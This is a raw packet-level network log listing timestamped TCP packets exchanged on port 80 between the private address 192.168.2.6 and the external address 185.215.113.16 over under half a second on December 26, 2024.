Dec 26, 2024 12:41:42.323597908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.323621035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.323673010 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.323895931 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.323909044 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.323957920 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.324660063 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.324892044 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.324907064 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.324965000 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.325722933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.325747013 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.325803041 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.326527119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.326708078 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.326766014 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.326980114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.327120066 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.327178955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.327891111 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.328027010 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.328108072 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.328851938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.328891039 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.329185963 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.329782009 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.329801083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.329886913 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.330558062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.330655098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.330704927 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.331423998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.331525087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.331574917 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.332317114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.332461119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.332535982 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.333261967 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.333317041 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.333555937 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.334120035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.334208012 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.334285975 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.337565899 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.337579012 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.337614059 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.337625027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.337636948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.337640047 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.337647915 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.337685108 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.337708950 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.338098049 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.338360071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.338406086 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.339242935 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.339380026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.339432001 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.340035915 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.340221882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.340311050 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.340858936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.340996981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.341063023 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.341774940 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.341939926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.342009068 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.342524052 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.342536926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.342605114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.342993021 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.343535900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.343926907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.343976974 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.344034910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.344093084 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.373373985 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.508299112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.508346081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.508430004 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.508713007 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.508824110 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.508871078 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.509583950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.509685993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.509737015 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.510490894 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.510626078 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.511022091 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.511377096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.511487007 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.511542082 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.512248993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.512345076 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.513009071 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.513288975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.513376951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.513431072 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.514043093 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.514111042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.514235973 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.514952898 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.515084982 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.515178919 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.515785933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.516009092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.516067982 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.516699076 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.516874075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.516921043 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.517584085 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.517813921 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.517859936 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.518460989 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.518562078 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.518610954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.519377947 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.519464970 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.519566059 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.520236969 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.520353079 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.520401955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.520988941 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.521135092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.521225929 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.522109985 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.522157907 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.522222042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.522270918 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.523060083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.523200035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.523444891 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.523801088 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.523937941 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.524015903 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.524744034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.524851084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.524899960 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.525595903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.525680065 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.525729895 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.526477098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.526590109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.527342081 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.527383089 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.527501106 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.527558088 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.528285027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.528363943 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.529014111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.529122114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.529266119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.529347897 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.530030966 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.530143976 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.530236006 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.530925035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.531003952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.531295061 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.531805038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.531930923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.531997919 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.532672882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.532826900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.532887936 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.533617020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.533711910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.533756018 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.534590006 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.534734964 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.534786940 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.535629988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.535808086 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.535852909 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.536662102 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.536765099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.536806107 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.537529945 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.537650108 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.537759066 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.537803888 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.538429976 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.538441896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.538481951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.539211035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.539231062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.539278984 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.539993048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.540196896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.540244102 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.540693998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.540818930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.541615963 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.541629076 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.541701078 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.542449951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.542576075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.542610884 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.543349981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.543448925 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.543493986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.544240952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.544343948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.544392109 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.545212030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.545269012 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.545389891 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.546335936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.546469927 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.546571970 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.547329903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.547434092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.547489882 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.547911882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.547955036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.548094034 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.548789978 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.548846960 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.548962116 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.549588919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.549632072 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.549686909 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.550472975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.550873995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.550966978 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.551394939 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.551484108 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.551558971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.552304029 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.552472115 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.552515984 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.553133965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.553246975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.553412914 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.554028034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.554157972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.554202080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.554903030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.598876953 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.668488979 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.719831944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.719850063 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.719862938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.719882965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.719938040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.720182896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.720298052 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.720339060 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.721075058 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.721170902 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.721306086 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.721939087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.722060919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.722816944 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.722847939 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.722935915 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.722975016 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.723910093 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.724033117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.724086046 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.724612951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.724754095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.724800110 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.725529909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.725625992 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.726411104 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.726449966 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.726528883 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.726566076 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.727305889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.727404118 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.727474928 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.728166103 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.728288889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.728358984 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.729096889 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.729212046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.729294062 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.729953051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.730046034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.730139017 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.730844021 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.730936050 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.731045008 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.731740952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.731872082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.731930017 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.732614040 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.732728958 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.732784986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.734524012 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.735606909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736202955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.736404896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736421108 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736558914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736572027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736588955 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736596107 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.736640930 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.736727953 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.736768961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.737564087 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.737579107 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.737616062 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.738419056 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.738599062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.739058971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.739279032 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.739437103 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.739507914 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.740122080 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.740264893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.740304947 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.741015911 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.741204977 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.741254091 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.741836071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.741991043 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.742094040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.742810011 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.742995977 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.743047953 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.743774891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.743793964 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.743839979 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.744590998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.744767904 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.744817019 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.745551109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.745577097 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.745614052 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.746375084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.746534109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.746577978 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.747179031 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.747194052 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.747248888 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.747833014 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.747936964 CET	80	49784	185.215.113.16	192.168.2.6
